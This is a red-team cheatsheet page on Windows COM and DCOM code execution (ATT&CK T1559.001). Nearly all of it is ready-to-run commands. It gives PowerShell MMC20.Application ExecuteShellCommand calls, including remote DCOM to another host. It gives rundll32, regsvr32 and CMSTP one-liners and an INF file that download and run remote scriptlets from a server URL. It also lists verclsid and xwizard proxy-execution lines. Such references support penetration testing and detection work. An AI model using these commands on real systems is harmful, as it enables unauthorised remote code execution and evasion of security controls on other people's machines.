📜

COM Execution - T1559.001

Templates and methods of quickly executing COM and DCOM

Windows Components Object Model quick execution cheatsheet
Powershell
Using Powershell with dotnet notation to quickly create a COM or DCOM instance using either CLSID or ProgID
Execution via CLSID
$a = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("49B2791A-B1AE-4C90-9B8E-E860BA07F889"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")
Execution via ProgID
$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")
DCOM Execution
Distributed COM is an extension of COM, which enables remote execution of COM among other things. Note that DCOM can also be executed Locally by specifying the loopback interface (127.0.0.1)
$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.0.0.2"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")
Rundll32
Execution via CLSID
Rundll32.exe -sta {GUID}
Execution via ProgID
Rundll32.exe -sta Scripting.Dictionary
Execution via shell32.dll
# Using shell32 exported function
Rundll32.exe shell32.dll,SHCreateLocalServerRunDll {GUID}
Scriptlet Execution from Remote Server
# Running Scriptlet via JavaScript -> GetObject()
rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;document.write();GetObject(“script:http://127.0.0.1:8080/calc.sct").Exec();
Remote Scriptlet via INF file
# with Rundll32
rundll32.exe advpack.dll,LaunchINFSection path\to\test.inf,DefaultInstall_SingleUser,1
Regsvr32
COM Local Scriptlet Execution 
# Running Scriptlet locally // without touching the registry
regsvr32 /s /n /u /i:malware.sct
COM Scriptlet Execution from Remote Server
# COM Scriptlet via Regsvr32 from remote location // without touching the registry
regsvr32 /s /n /u /i:http://server/file.sct C:\Windows\system32\scrobj.dll
CMSTP
Execution via INF file that downloads and executes a scriptlet (sct)
# INF File
# Running Scriptlet via CMSTP.exe INF-SCT file
[version]
Signature=$Chicago$
AdvancedINF=2.5
 
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
 
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://127.0.0.1:8080/test.sct
 
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="MalTrak"
ShortSvcName="MalTrak"
cmstp.exe /su test.inf
Credit to @Amr_Thabet for the INF code
PyCOM
​🛠
​
​
Verclsid
Execution via CLSID
verclsid.exe /S /C {CLSID}
Xwizard
Execution via CLSID
xwizard.exe RunWizard /taero /u {CLSID}
​
ATT&CK Techniques in this Page
Command and Scripting Interpreter: PowerShell - T1059.001
Inter-Process Communication: Component Object Model - T1559.001
System Binary Proxy Execution: CMSTP - T1218.003
System Binary Proxy Execution: Rundll32 - T1218.011
System Binary Proxy Execution: Verclsid - T1218.012
System Binary Proxy Execution: Regsvr32 - T1218.010

COM Hijacking - T1546.015

Next - Internals, Reversing

Windows Exploit Mitigations

Last modified 10mo ago